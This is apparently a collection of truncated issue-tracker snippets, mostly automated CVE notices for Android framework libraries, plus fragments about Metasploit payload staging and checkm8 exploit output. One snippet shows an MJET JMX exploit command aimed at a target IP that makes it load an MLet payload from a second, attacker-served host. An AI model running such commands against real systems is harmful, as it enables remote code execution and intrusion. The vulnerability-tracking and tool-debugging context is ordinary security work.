-
## CVE-2023-21267 - Medium Severity Vulnerability
Vulnerable Library - baseandroid-10.0.0_r34
Android framework classes and services
Library home page: https://android.googlesource.com/platform/fra…
-
## CVE-2023-21266 - High Severity Vulnerability
Vulnerable Library - baseandroid-10.0.0_r34
Android framework classes and services
Library home page: https://android.googlesource.com/platform/frame…
-
## CVE-2023-21291 - Medium Severity Vulnerability
Vulnerable Library - baseandroid-10.0.0_r34
Android framework classes and services
Library home page: https://android.googlesource.com/platform/fra…
-
## CVE-2023-21288 - Medium Severity Vulnerability
Vulnerable Library - baseandroid-10.0.0_r34
Android framework classes and services
Library home page: https://android.googlesource.com/platform/fra…
-
i send payload :
./java -jar /root/mjet/mjet.jar -t 192.168.197.25 -p 1099 -u http://192.168.197.75:8080/mlet/
---------------------------------------------------
MJET - Mogwai Security JMX Exploit…
sevck updated
6 years ago
-
## CVE-2023-21249 - Medium Severity Vulnerability
Vulnerable Library - baseandroid-11.0.0_r39
Android framework classes and services
Library home page: https://android.googlesource.com/platform/fra…
-
https://docs.metasploit.com/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html#cookies--cookiejars
Use the first 2 lines in the example:
```
…
-
When trying to use CmdStager to stage a python based meterpreter payload for pull #14947 the exception `Exploit failed: Msf::NoCompatiblePayloadError Failed to generate an executable payload due to a…
-
*** checkm8 exploit by axi0mX ***
Found: CPID:8950 CPRV:20 CPFM:03 SCEP:10 BDID:00 ECID: IBFL:00 SRTG:[iBoot-1145.3]
Traceback (most recent call last):
File "./ipwndfu", line 63, in
checkm8…
-
## CVE-2020-27059 - High Severity Vulnerability
Vulnerable Library - baseandroid-10.0.0_r34
Android framework classes and services
Library home page: https://android.googlesource.com/platform/frame…